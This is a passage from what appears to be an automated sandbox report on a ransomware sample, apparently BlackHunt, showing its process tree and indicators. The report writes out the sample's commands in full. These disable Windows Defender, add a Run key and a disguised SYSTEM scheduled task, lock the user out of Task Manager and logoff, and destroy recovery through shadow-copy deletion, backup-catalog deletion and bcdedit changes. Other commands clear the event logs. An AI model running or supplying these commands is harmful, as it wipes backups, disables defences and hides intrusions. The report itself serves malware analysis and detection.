SeRestorePrivilege 4352 wbengine.exe Token: SeSecurityPrivilege 4352 wbengine.exe Token: SeSecurityPrivilege 3044 wevtutil.exe Token: SeBackupPrivilege 3044 wevtutil.exe Token: SeSecurityPrivilege 920 wevtutil.exe Token: SeBackupPrivilege 920 wevtutil.exe Token: SeSecurityPrivilege 8356 wevtutil.exe Token: SeBackupPrivilege 8356 wevtutil.exe Token: SeSecurityPrivilege 9168 wevtutil.exe Token: SeBackupPrivilege 9168 wevtutil.exe Token: SeSecurityPrivilege 8812 wevtutil.exe Token: SeBackupPrivilege 8812 wevtutil.exe Token: SeDebugPrivilege 7628 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 996 wrote to memory of 4880 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 88 PID 996 wrote to memory of 4880 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 88 PID 996 wrote to memory of 5076 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 90 PID 996 wrote to memory of 5076 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 90 PID 996 wrote to memory of 1740 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 92 PID 996 wrote to memory of 1740 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 92 PID 996 wrote to memory of 636 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 94 PID 996 wrote to memory of 636 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 94 PID 4880 wrote to memory of 4204 4880 cmd.exe 162 PID 4880 wrote to memory of 4204 4880 cmd.exe 162 PID 996 wrote to memory of 2220 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 97 PID 996 wrote to memory of 2220 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 97 PID 5076 wrote to memory of 3932 5076 cmd.exe 99 PID 5076 wrote to memory of 3932 5076 cmd.exe 99 PID 1740 wrote to memory of 4032 1740 cmd.exe 100 PID 1740 wrote to memory of 4032 1740 cmd.exe 100 PID 636 wrote to memory of 4692 636 cmd.exe 101 PID 636 wrote to memory of 4692 636 cmd.exe 101 PID 2220 wrote to memory of 4232 2220 cmd.exe 102 PID 2220 wrote to memory of 4232 2220 cmd.exe 102 PID 996 wrote to memory of 3044 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 103 PID 996 wrote to memory of 3044 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 103 PID 996 wrote to memory of 3840 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 105 PID 996 wrote to memory of 3840 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 105 PID 996 wrote to memory of 1208 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 106 PID 996 wrote to memory of 1208 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 106 PID 996 wrote to memory of 1308 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 191 PID 996 wrote to memory of 1308 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 191 PID 996 wrote to memory of 764 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 111 PID 996 wrote to memory of 764 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 111 PID 996 wrote to memory of 1356 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 117 PID 996 wrote to memory of 1356 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 117 PID 996 wrote to memory of 3304 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 114 PID 996 wrote to memory of 3304 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 114 PID 1208 wrote to memory of 4756 1208 cmd.exe 113 PID 1208 wrote to memory of 4756 1208 cmd.exe 113 PID 3044 wrote to memory of 4164 3044 cmd.exe 118 PID 3044 wrote to memory of 4164 3044 cmd.exe 118 PID 996 wrote to memory of 4196 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 120 PID 996 wrote to memory of 4196 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 120 PID 3840 wrote to memory of 4968 3840 cmd.exe 119 PID 3840 wrote to memory of 4968 3840 cmd.exe 119 PID 996 wrote to memory of 3012 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 122 PID 996 wrote to memory of 3012 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 122 PID 996 wrote to memory of 3424 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 124 PID 996 wrote to memory of 3424 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 124 PID 1308 wrote to memory of 2576 1308 vssadmin.exe 125 PID 1308 wrote to memory of 2576 1308 vssadmin.exe 125 PID 764 wrote to memory of 3080 764 cmd.exe 127 PID 764 wrote to memory of 3080 764 cmd.exe 127 PID 3304 wrote to memory of 848 3304 cmd.exe 130 PID 3304 wrote to memory of 848 3304 cmd.exe 130 PID 996 wrote to memory of 3472 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 128 PID 996 wrote to memory of 3472 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 128 PID 996 wrote to memory of 3728 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 131 PID 996 wrote to memory of 3728 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 131 PID 1356 wrote to memory of 868 1356 cmd.exe 185 PID 1356 wrote to memory of 868 1356 cmd.exe 185 PID 996 wrote to memory of 2512 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 134 PID 996 wrote to memory of 2512 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 134 PID 996 wrote to memory of 5004 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 135 PID 996 wrote to memory of 5004 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 135 PID 996 wrote to memory of 892 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 136 PID 996 wrote to memory of 892 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 136 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe"C:\Users\Admin\AppData\Local\Temp\0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:996 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:4204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1308
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3424
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3472
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3728
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:5004
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:892
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:5108
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:784
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:816
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:4204
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2088
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe" /F2⤵PID:3092
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe" /F3⤵
- Creates scheduled task(s)
PID:4316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:5000
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:1308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2372
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2168
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3224
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:868
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2588
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4516
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2784
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:408
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2140
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:9144
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:8436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:6940
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:8488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8680
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:8676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3304
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8440
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:460
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6644
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:5008
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:9024
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:8756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:8828
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:8772
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:7648
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8976
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
